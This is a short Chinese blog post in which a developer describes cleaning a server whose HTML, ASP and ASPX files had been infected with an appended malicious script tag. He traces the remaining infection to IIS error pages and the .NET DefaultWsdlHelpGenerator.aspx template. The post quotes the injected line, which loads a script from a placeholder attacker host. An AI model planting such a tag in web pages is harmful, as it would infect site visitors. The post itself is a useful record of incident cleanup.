杀掉ASMX文件里面的毒 - lazylu

服务器中毒了，所有的HTM/ASPX/ASP等文件，都加了一段恶意代码在最后，类似于：

<script src=http://贱人网站/images/images/1.css></script>

在网站目录下面用文本替换软件狂杀了一通，全部扫干净了，BS系统也没有出现中毒代码了~

可是当我访问ASMX的时候，出事了，在VS里面添加ASMX，因为JS病毒阻碍了VS内嵌IE加载ASMX文件分析，所以无法添加这个WEB SERVICE。用FLASHGET下载一看，得，病毒代码就在里面。

可众所周知，ASMX文件里面就一行：

<%@ WebService Language="vb" Codebehind="什么什么Service.asmx.vb" Class="什么什么Service" %>
并没有病毒代码。而这现在的病毒都很懒，总不至于侵入我的.net 1.1的DLL来输出病毒代码吧？咋办涅？看来得从ASMX文件的生成过程入手。

可GOOGLE了半天，并没有很详细的中文资料，MSDN貌似也没有详细解释ASMX页面的生成，去K英文的资料慢慢摸索吧，又太慢了。

恰好这个时候，在浏览器里面输网址的时候，打错了一个字母，出了个404错误页面……奇怪了，怎么好像IE在加载病毒代码？恍然大悟，IIS里面不是针对所有的错误都有自定义错误页面吗？马上到IIS的设置一看，果然，在C:\windows\help\iishelp\common里面。看来病毒应该是感染了C盘的文件，而ASMX的渲染（Render）又使用了某些C盘上的文件，而这些文件很可能就在.net的framework目录下。果然，一搜索就发现C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\CONFIG\DefaultWsdlHelpGenerator.aspx有病毒，删除后，马上就好了。

教训
1、杀毒要均匀，不要忘了C盘（实在是低级错误啊）

2、DefaultWsdlHelpGenerator.aspx实际上是VS的一个模板文件，在VS和.net环境下，有很多类似D东东，以后要多多，多多，多多，多多探索和学习